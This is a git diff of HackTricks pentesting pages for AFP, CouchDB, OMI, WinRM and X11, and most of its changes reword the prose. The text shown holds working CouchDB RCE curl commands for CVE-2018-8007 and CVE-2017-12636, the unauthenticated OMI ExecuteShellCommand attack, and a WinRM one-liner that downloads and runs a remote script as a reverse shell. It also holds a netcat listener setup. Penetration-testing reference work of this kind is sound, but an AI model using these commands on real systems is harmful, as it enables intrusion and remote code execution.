Lists available AFP volumes and files | -| afp-path-vuln | Lists all AFP volumes and files[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch15.html#ch15fn48) | -| afp-serverinfo | Displays AFP server information | -| afp-showmount | Lists available AFP shares and respective ACLs | +**Scripts and Their Descriptions:** + +- **afp-ls**: This script is utilized to list the available AFP volumes and files. +- **afp-path-vuln**: It lists all AFP volumes and files, highlighting potential vulnerabilities. +- **afp-serverinfo**: This provides detailed information about the AFP server. +- **afp-showmount**: It lists available AFP shares along with their respective ACLs. ### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#afp) diff --git a/network-services-pentesting/5984-pentesting-couchdb.md b/network-services-pentesting/5984-pentesting-couchdb.md index c2544c56a..c17e51e80 100644 --- a/network-services-pentesting/5984-pentesting-couchdb.md +++ b/network-services-pentesting/5984-pentesting-couchdb.md @@ -16,9 +16,9 @@ Other ways to support HackTricks: ## **Basic Information** -CouchDB is a document-oriented database and within each document fields are stored as key-value maps. Fields can be either a simple key/value pair, list, or map. +**CouchDB** is a versatile and powerful **document-oriented database** that organizes data using a **key-value map** structure within each **document**. Fields within the document can be represented as **key/value pairs, lists, or maps**, providing flexibility in data storage and retrieval. -Each document that is stored in the database is given a document-level unique identifier (`_id`) as well as a revision (`_rev`) number for each change that is made and saved to the database. +Every **document** stored in CouchDB is assigned a **unique identifier** (`_id`) at the document level. Additionally, each modification made and saved to the database is assigned a **revision number** (`_rev`). This revision number allows for efficient **tracking and management of changes**, facilitating easy retrieval and synchronization of data within the database. **Default port:** 5984(http), 6984(https) @@ -58,8 +58,8 @@ Note that if accessing the root of couchdb you receive a `401 Unauthorized` with These are the endpoints where you can access with a **GET** request and extract some interesting info. You can find [**more endpoints and more detailed descriptions in the couchdb documentation**](https://docs.couchdb.org/en/latest/api/index.html). * **`/_active_tasks`** List of running tasks, including the task type, name, status and process ID. -* \*\*`/_all_dbs`\*\*Returns a list of all the databases in the CouchDB instance. -* \*\*`/_cluster_setup`\*\*Returns the status of the node or cluster, per the cluster setup wizard. +* **`/_all_dbs`** Returns a list of all the databases in the CouchDB instance. +* **`/_cluster_setup`**Returns the status of the node or cluster, per the cluster setup wizard. * **`/_db_updates`** Returns a list of all database events in the CouchDB instance. The existence of the `_global_changes` database is required to use this endpoint. * **`/_membership`** Displays the nodes that are part of the cluster as `cluster_nodes`. The field `all_nodes` displays all nodes this node knows about, including the ones that are part of the cluster. * **`/_scheduler/jobs`** List of replication jobs. Each job description will include source and target information, replication id, a history of recent event, and a few other things. @@ -71,8 +71,8 @@ These are the endpoints where you can access with a **GET** request and extract * **`/_node/{node-name}/_system`** The \_systemresource returns a JSON object containing various system-level statistics for the running server\_.\_ You can use \_\_`_local` as {node-name} to get current node info. * **`/_node/{node-name}/_restart`** * **`/_up`** Confirms that the server is up, running, and ready to respond to requests. If [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) is `true` or `nolb`, the endpoint will return a 404 response. -* \*\*`/_uuids`\*\*Requests one or more Universally Unique Identifiers (UUIDs) from the CouchDB instance. -* \*\*`/_reshard`\*\*Returns a count of completed, failed, running, stopped, and total jobs along with the state of resharding on the cluster. +* **`/_uuids`**Requests one or more Universally Unique Identifiers (UUIDs) from the CouchDB instance. +* **`/_reshard`**Returns a count of completed, failed, running, stopped, and total jobs along with the state of resharding on the cluster. More interesting information can be extracted as explained here: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB) @@ -149,19 +149,13 @@ curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[] ## CouchDB RCE -### Erlang Cookie +### **Erlang Cookie Security Overview** -In the CouchDB docs, in the [cluster set-up section](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup), it talks about the different ports used by CouchDB: +Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). -> CouchDB in cluster mode uses the port `5984` just as standalone, but it also uses `5986` for node-local APIs. -> -> Erlang uses TCP port `4369` (EPMD) to find other nodes, so all servers must be able to speak to each other on this port. In an Erlang Cluster, all nodes are connected to all other nodes. A mesh. +In the CouchDB documentation, specifically in the section concerning cluster set-up ([link](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), the use of ports by CouchDB in a cluster mode is discussed. It's mentioned that, as in standalone mode, port `5984` is used. Additionally, port `5986` is for node-local APIs, and importantly, Erlang requires TCP port `4369` for the Erlang Port Mapper Daemon (EPMD), facilitating node communication within an Erlang cluster. This setup forms a network where each node is interlinked with every other node. -And then there’s an interesting warning: - -![1536931232858](https://0xdf.gitlab.io/img/1536931232858.png) - -If we look in the process list, we can see that cookie, “monster”: +A crucial security advisory is highlighted regarding port `4369`. If this port is made accessible over the Internet or any untrusted network, the system's security heavily relies on a unique identifier known as the "cookie." This cookie acts as a safeguard. For instance, in a given process list, the cookie named "monster" might be observed, indicating its operational role in the system's security framework. ``` www-data@canape:/$ ps aux | grep couchdb @@ -170,182 +164,108 @@ root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /va homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b ``` -**You can**[ **read this section to learn how to abuse Erlangs cookies to obtain RCE**](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**.**\ -Also, you can read some **Canape HTB machine writeup** [**like this one**](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution) to see and **practice** how to **exploit this vuln**. +For those interested in understanding how this "cookie" can be exploited for Remote Code Execution (RCE) within the context of Erlang systems, a dedicated section is available for further reading. It details the methodologies for leveraging Erlang cookies in unauthorized manners to achieve control over systems. You can **[explore the detailed guide on abusing Erlang cookies for RCE here](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**. -### **Successful CVE-2018-8007 with local.ini write permissions** +### **Exploiting CVE-2018-8007 through Modification of local.ini** -In writing this post, I found a new CVE had been released for CouchDB from mdsec, [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/). It also requires writes to the `local.ini` file, so it isn’t a useful option for Canape. But since I’ve already made it writable as root, let’s see if we can get it to work. +Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). -Start with a clean and now writable `local.ini` (and a backup): +A recently disclosed vulnerability, CVE-2018-8007, affecting Apache CouchDB was explored, revealing that exploitation requires write permissions to the `local.ini` file. Although not directly applicable to the initial target system due to security restrictions, modifications were made to grant write access to the `local.ini` file for exploration purposes. Detailed steps and code examples are provided below, demonstrating the process. -``` +First, the environment is prepared by ensuring the `local.ini` file is writable, verified by listing the permissions: + +```bash root@canape:/home/homer/etc# ls -l -total 40 -r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini -rw-rw-rw- 1 homer homer 4841 Sep 14 17:39 local.ini -r--r--r-- 1 root root 4841 Sep 14 14:30 local.ini.bk -r--r--r-- 1 homer homer 1345 Jan 14 2018 vm.args ``` -We can use curl to modify the origins in the `local.ini` file. The vulnerability here is that if we use curl to put a new origin and then newlines, we can write additional stuff, including a new header and details. So we’ll take advantage of the `[os_daemons]` field, and add a process for CouchDB to try to keep running: +To exploit the vulnerability, a curl command is executed, targeting the `cors/origins` configuration in `local.ini`. This injects a new origin along with additional commands under the `[os_daemons]` section, aiming to execute arbitrary code: ```bash www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/cors/origins' -H "Accept: application/json" -H "Content-Type: application/json" -d "0xdf\n\n[os_daemons]\ntestdaemon = /usr/bin/touch /tmp/0xdf" ``` -In the root shell, we can see what changes: +Subsequent verification shows the injected configuration in `local.ini`, contrasting it with a backup to highlight the changes: -``` +```bash root@canape:/home/homer/etc# diff local.ini local.ini.bk 119,124d118 -< < [cors] < origins = 0xdf -< < [os_daemons] < test_daemon = /usr/bin/touch /tmp/0xdf ``` -And yet, the file isn’t there: +Initially, the expected file (`/tmp/0xdf`) does not exist, indicating that the injected command has not been executed yet. Further investigation reveals that processes related to CouchDB are running, including one that could potentially execute the injected command: -``` -root@canape:/home/homer/etc# ls /tmp/0xdf -ls: cannot access '/tmp/0xdf': No such file or directory -``` - -If we look at the processes running with “couchdb” in the cmdline, we see not only the line command line that gives us the cookie value we used earlier, but also `runsrv couchdb`: - -``` +```bash root@canape:/home/homer/bin# ps aux | grep couch -root 711 0.0 0.0 4240 696 ? Ss 14:28 0:00 runsv couchdb -root 728 0.0 0.0 4384 812 ? S 14:28 0:00 svlogd -tt /var/log/couchdb -homer 1785 0.8 3.1 638992 31248 ? Sl 17:55 0:01 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/bin/.. -progname couchdb -- -home /home/homer -- -boot /home/homer/bi -n/../releases/2.0.0/couchdb -name couchdb@localhost -setcookie monster -kernel error_logger silent -sasl sasl_error_logger false -noshell -noinput -config /home/homer/bin/../releases/2.0.0/sys.config ``` -If we kill that process, it comes right back (notice the new pid): +By terminating the identified CouchDB process and allowing the system to automatically restart it, the execution of the injected command is triggered, confirmed by the existence of the previously missing file: -``` +```bash root@canape:/home/homer/etc# kill 711 -root@canape:/home/homer/etc# ps aux | grep runsrv -root 2031 0.0 0.0 14224 980 pts/2 S+ 18:09 0:00 grep --color=auto runsrv -``` - -And, on restart, runs the OS\_Daemons: - -``` root@canape:/home/homer/etc# ls /tmp/0xdf /tmp/0xdf ``` -### **Successful Attempt Via CVE-2017-12636 with local.ini write permissions** +This exploration confirms the viability of CVE-2018-8007 exploitation under specific conditions, notably the requirement for writable access to the `local.ini` file. The provided code examples and procedural steps offer a clear guide for replicating the exploit in a controlled environment. -CVE-2017-12636 allows for code execution through the couchdb process. However, it won’t work in this configuration. +For more details on CVE-2018-8007, refer to the advisory by mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/). -There are a few POCs out there as reference: +### **Exploring CVE-2017-12636 with Write Permissions on local.ini** -* [https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py) -* [https://www.exploit-db.com/exploits/44913/](https://www.exploit-db.com/exploits/44913/) +Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). -We’d need to write a new query\_server, and then invoke that. When Canape was released, most of the POCs were for couchdb 1.x, but this box is running 2, so the query\_servers path from most of the POCs doesn’t exist. That’s changed now, but we’ll walk the same steps. First, get the version, and show that the 1.X path doesn’t exist: +A vulnerability known as CVE-2017-12636 was explored, which enables code execution via the CouchDB process, although specific configurations may prevent its exploitation. Despite numerous Proof of Concept (POC) references available online, adjustments are necessary to exploit the vulnerability on CouchDB version 2, differing from the commonly targeted version 1.x. The initial steps involve verifying the CouchDB version and confirming the absence of the expected query servers path: ```bash -www-data@canape:/var/www/git$ curl http://localhost:5984 -{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}} - -www-data@canape:/var/www/git$ curl http://0xdf:df@localhost:5984/_config/query_servers/ -{"error":"not_found","reason":"Database does not exist."} +curl http://localhost:5984 +curl http://0xdf:df@localhost:5984/_config/query_servers/ ``` -Update with the new path for 2.0: +To accommodate CouchDB version 2.0, a new path is utilized: ```bash -www-data@canape:/var/www/git$ curl 'http://0xdf:df@localhost:5984/_membership' -{"all_nodes":["couchdb@localhost"],"cluster_nodes":["couchdb@localhost"]} - -www-data@canape:/var/www/git$ curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers -{"coffeescript":"./bin/couchjs ./share/server/main-coffee.js","javascript":"./bin/couchjs ./share/server/main.js"} +curl 'http://0xdf:df@localhost:5984/_membership' +curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers ``` -From there, we should add a query\_server and then invoke it, but we aren’t able to. +Attempts to add and invoke a new query server were met with permission-related errors, as indicated by the following output: ```bash -www-data@canape:/var/www/git$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' -{"error":"badmatch","reason":"{badrpc,{'EXIT',{{{badmatch,{error,eacces}},\n [{config_writer,save_to_file,2,\n [{file,\"src/config_writer.erl\"},{line,38}]},\n {config,handle_call,3,[{file,\"src/config.erl\"},{line,222}]},\n {gen_server,try_handle_call,4,\n [{file,\"gen_server.erl\"},{line,629}]},\n {gen_server,handle_msg,5,\n [{file,\"gen_server.erl\"},{line,661}]},\n {proc_lib,init_p_do_apply,3,\n [{file,\"proc_lib.erl\"},{line,240}]}]},\n {gen_server,call,\n [config,\n {set,\"query_servers\",\"cmd\",\n \"/sbin/ifconfig > /tmp/df\",true,nil}]}}}}","ref":1617834159} +curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' ``` -Some Googling shows that this is an issue with permissions. In fact, if we check with out root shell, we can see that the `local.ini` file is not writable by anyone, let alone www-data: - -``` -root@canape:/home/home/etc# ls -ls local.ini -8 -r--r--r-- 1 homer homer 4841 Sep 14 17:11 local.ini -``` - -So that’s a dead end for Canape. But if we want to try to get it working, we can make it readable with our root or homer access, and continue down this path. We’ll make a backup of the original so we can see what changes: - -``` -root@canape:/# cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b -root@canape:/# chmod 666 /home/homer/etc/local.ini -``` - -Now, back to our www-data shell: +Further investigation revealed permission issues with the `local.ini` file, which was not writable. By modifying the file permissions with root or homer access, it became possible to proceed: ```bash -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' -"" +cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b +chmod 666 /home/homer/etc/local.ini ``` -``` -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' -"" -``` - -We get back the previous value for the cmd query server, which means success. And in the root shell, we can see it worked: - -``` -root@canape:/home/homer/etc# diff local.ini local.ini.bk -48c48 -< cmd = /sbin/ifconfig > /tmp/df ---- -> cmd = -``` - -Now, we should be able to create a db, and then a document in that db, and the request it with a view that maps our query\_server to get execution. - -Create db and document: +Subsequent attempts to add the query server succeeded, as demonstrated by the lack of error messages in the response. The successful modification of the `local.ini` file was confirmed through file comparison: ```bash -www-data@canape:/dev/shm$ curl 'http://0xdf:df@localhost:5984/_all_dbs' -["_global_changes","_metadata","_replicator","_users","god","passwords","simpsons","vultest"] -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df' -{"ok":true} -www-data@canape:/dev/shm$ curl 'http://0xdf:df@localhost:5984/_all_dbs' -["_global_changes","_metadata","_replicator","_users","df","passwords","simpsons"] - -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}' -{"ok":true,"id":"zero","rev":"1-967a00dff5e02add41819138abb3284d"} +curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' ``` -``` -www-data@canape:/dev/shm$ curl 'http://0xdf:df@localhost:5984/_all_dbs' -["_global_changes","_metadata","_replicator","_users","god","passwords","simpsons","vultest"] -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df' -{"ok":true} -www-data@canape:/dev/shm$ curl 'http://0xdf:df@localhost:5984/_all_dbs' -["_global_changes","_metadata","_replicator","_users","df","passwords","simpsons"] - -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}' -{"ok":true,"id":"zero","rev":"1-967a00dff5e02add41819138abb3284d"} -``` - -Request it in a view: +The process continued with the creation of a database and a document, followed by an attempt to execute code via a custom view mapping to the newly added query server: ```bash -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' -H "Content-Type: application/json" +curl -X PUT 'http://0xdf:df@localhost:5984/df' +curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}' +curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' ``` -#### [Summary](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0) with a different payload +A **[summary](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** with an alternative payload provides further insights into exploiting CVE-2017-12636 under specific conditions. **Useful resources** for exploiting this vulnerability include: + +- [POC exploit code](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py) +- [Exploit Database entry](https://www.exploit-db.com/exploits/44913/) ## Shodan diff --git a/network-services-pentesting/5985-5986-pentesting-omi.md b/network-services-pentesting/5985-5986-pentesting-omi.md index e0ace0254..eae04e1f5 100644 --- a/network-services-pentesting/5985-5986-pentesting-omi.md +++ b/network-services-pentesting/5985-5986-pentesting-omi.md @@ -7,35 +7,31 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. -## Basic Information +### **Basic Information** -OMI is an [open-source](https://github.com/microsoft/omi) remote configuration management tool developed by Microsoft. OMI agents are commonly found installed on Azure Linux servers when the following services are in use: +**OMI** is presented as an **[open-source](https://github.com/microsoft/omi)** tool by Microsoft, designed for remote configuration management. It's particularly relevant for Linux servers on Azure that utilize services such as: -* Azure Automation -* Azure Automatic Update -* Azure Operations Management Suite -* Azure Log Analytics -* Azure Configuration Management -* Azure Diagnostics +- **Azure Automation** +- **Azure Automatic Update** +- **Azure Operations Management Suite** +- **Azure Log Analytics** +- **Azure Configuration Management** +- **Azure Diagnostics** -When these services are configured, the omiengine process will listen on all interfaces and being running as the root user. +The process `omiengine` is initiated and listens on all interfaces as root when these services are activated. -
+**Default ports** used are **5985** (http) and **5986** (https). -**Default port:** 5985(http), 5986(https) +### **[CVE-2021-38647 Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)** -## [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647) +As observed on September 16, Linux servers deployed in Azure with the mentioned services are susceptible due to a vulnerable version of OMI. This vulnerability lies in the OMI server's handling of messages through the `/wsman` endpoint without requiring an Authentication header, incorrectly authorizing the client. -As of September 16, newly created Linux servers in Azure are still packaged with a vulnerable version of the OMI agent. After deploying a Linux server and enabling one the services listed above, the server will be in a vulnerable state. - -The OMI server receives configuration management messages via the /wsman endpoint. Typically, an Authentication header is passed along with the message and the OMI server will ensure the client is authorized communicate. In this case the vulnerability is that when there is no Authentication header the server incorrectly accepts the message and executes the instruction under the root user. - -By posting an “ExecuteShellCommand” SOAP payload to the server with no Authentication header specified, it will execute the command as root. +An attacker can exploit this by sending an "ExecuteShellCommand" SOAP payload without an Authentication header, compelling the server to execute commands with root privileges. ```xml ``` -Find full exploit in [https://github.com/horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647) +For a more information about this CVE **[check this](https://github.com/horizon3ai/CVE-2021-38647)**. ## References @@ -63,7 +59,7 @@ Find full exploit in [https://github.com/horizon3ai/CVE-2021-38647](https://gith * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index 309c37b36..d3dc61f71 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -31,49 +31,58 @@ Stay informed with the newest bug bounties launching and crucial platform update ## WinRM -[Windows Remote Management](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) (WinRM) is a Microsoft protocol that **allows remote management of Windows machines** over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI. +[Windows Remote Management (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) is highlighted as a **protocol by Microsoft** that enables the **remote management of Windows systems** through HTTP(S), leveraging SOAP in the process. It's fundamentally powered by WMI, presenting itself as an HTTP-based interface for WMI operations. -If WinRM is enabled on the machine, it's trivial to remotely administer the machine from PowerShell. In fact, you can just drop in to a remote PowerShell session on the machine (as if you were using SSH!) - -The easiest way to detect whether WinRM is available is by seeing if the port is opened. WinRM will listen on one of two ports: +The presence of WinRM on a machine allows for straightforward remote administration via PowerShell, akin to how SSH works for other operating systems. To determine if WinRM is operational, checking for the opening of specific ports is recommended: * **5985/tcp (HTTP)** * **5986/tcp (HTTPS)** -If one of these ports is open, WinRM is configured and you can try entering a remote session. +An open port from the list above signifies that WinRM has been set up, thus permitting attempts to initiate a remote session. -## **Initiating WinRM Session**. +### **Initiating a WinRM Session** -We can configure PowerShell to work with WinRM. According to Microsoft documentation, Enable-PSRemoting is a cmdlet that configures the computer to receive PowerShell remote commands. If we have access to an elevated PowerShell prompt on the victim, we cam enable it and add any "attackers" as trusted hosts. We can run the following two commands: +To configure PowerShell for WinRM, Microsoft's `Enable-PSRemoting` cmdlet comes into play, setting up the computer to accept remote PowerShell commands. With elevated PowerShell access, the following commands can be executed to enable this functionality and designate any host as trusted: -``` +```powershell Enable-PSRemoting -Force -Set-Item wsman:\localhost\client\trustedhosts * +Set-Item wsman:\localhost\client\trustedhosts * ``` -This adds a wildcard to the trustedhosts setting. Be wary of what that entails. _Note: I also had to change the network type on my attack machine from "Public" to "Work" network._ +This approach involves adding a wildcard to the `trustedhosts` configuration, a step that requires cautious consideration due to its implications. It's also noted that altering the network type from "Public" to "Work" might be necessary on the attacker's machine. -You can also **activate** WinRM **remotely** _\*\*\_using \_wmic_: +Moreover, WinRM can be **activated remotely** using the `wmic` command, demonstrated as follows: -``` +```powershell wmic /node: process call create "powershell enable-psremoting -force" ``` +This method allows for the remote setup of WinRM, enhancing the flexibility in managing Windows machines from afar. + + ### Test if configured -Once the attack machine is configured, use the `Test-WSMan` function to test whether the target is configured for WinRM. You should see some information returned about the protocol version and wsmid: +To verify the setup of your attack machine, the `Test-WSMan` command is utilized to check if the target has WinRM configured properly. By executing this command, you should expect to receive details concerning the protocol version and wsmid, indicating successful configuration. Below are examples demonstrating the expected output for a configured target versus an unconfigured one: + +- For a target that **is** properly configured, the output will look similar to this: + +```bash +Test-WSMan +``` + +The response should contain information about the protocol version and wsmid, signifying that WinRM is set up correctly. ![](<../.gitbook/assets/image (161) (1).png>) -![](<../.gitbook/assets/image (162).png>) +- Conversely, for a target **not** configured for WinRM, the would result in no such detailed information, highlighting the absence of a proper WinRM setup. -In this case the first one is configured and the second isn't. +![](<../.gitbook/assets/image (162).png>) ### Execute a command -Now we can use PowerShell's `Invoke-Command` to remotely execute a command on the target over WinRM. To remotely run `ipconfig` and see the output: +To execute `ipconfig` remotely on a target machine and view its output do: -``` +```powershell Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username] ``` @@ -81,25 +90,25 @@ Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /al You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do: -```ruby +```powershell Invoke-Command -ComputerName -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"] ``` ### Execute a Script -```ruby +```powershell Invoke-Command -ComputerName -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta] ``` ### Get reverse-shell -```ruby +```powershell Invoke-Command -ComputerName -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"} ``` ### Get a PS session -Or, if you want to drop right into an interactive PowerShell session, use the `Enter-PSSession` function: +To get an interactive PowerShell shell use `Enter-PSSession`: ```powershell #If you need to use different creds @@ -124,19 +133,17 @@ Exit-PSSession # This will leave it in background if it's inside an env var (New ### **Forcing WinRM Open** -If you really want to use PS Remoting and WinRM but the target isn't configured for it, you could "force" it on through a single command. I wouldn't recommend this but if you really wanted to use WinRM or PSRemoting than by all means do it this way. For example, using PSExec: +To use PS Remoting and WinRM but the computer isn't configured, you could enable it with: +```powershell +.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force" ``` -PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force" -``` - -Now we can enter a remote PS session on the victim. ### Saving and Restoring sessions This **won't work** if the the **language** is **constrained** in the remote computer. -```ruby +```powershell #If you need to use different creds $password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force ## Note the ".\" in the suername to indicate it's a local user (host domain) @@ -150,7 +157,7 @@ Enter-PSSession -Session $sess1 Inside this sessions you can load PS scripts using _Invoke-Command_ -```ruby +```powershell Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1 ``` diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index 07f87e230..b21885786 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md @@ -31,8 +31,7 @@ Stay informed with the newest bug bounties launching and crucial platform update ## Basic Information -The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment. X also does not mandate the user interface – individual programs handle this.\ -From: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) +**X Window System** (X) is a versatile windowing system prevalent on UNIX-based operating systems. It provides a framework for creating graphical **user interfaces (GUIs)**, with individual programs handling the user interface design. This flexibility allows for diverse and customizable experiences within the X environment. **Default port:** 6000 @@ -164,27 +163,25 @@ Other way: **Reverse Shell:** Xrdp also allows to take reverse shell via Netcat. Type in the following command: -**./xrdp.py \ –no-disp** +```bash +./xrdp.py \ –no-disp +``` -![](../.gitbook/assets/112217\_0051\_ExploitingX15.jpeg) +In the interface you can see the **R-shell option**. -It will prompt a new control pane where we can see the R-shell option, which is illustrated below: +Then, start a **Netcat listener** in your local system on port 5555. -![](../.gitbook/assets/112217\_0051\_ExploitingX16.jpeg) +```bash +nc -lvp 5555 +``` -We will start the Netcat listening mode in our local system on port 5555, which is illustrated below: +Then, put your IP address and port in the **R-Shell** option and click on **R-shell** to get a shell -![](../.gitbook/assets/112217\_0051\_ExploitingX17.jpeg) -Then add the IP and port and then select R-Shell, which is illustrated below: - -![](../.gitbook/assets/112217\_0051\_ExploitingX18.jpeg) - -Now as can be seen below we have complete system access: - -![](../.gitbook/assets/112217\_0051\_ExploitingX19.jpeg) - -{% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %} +## References +* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) +* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) +* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) ## 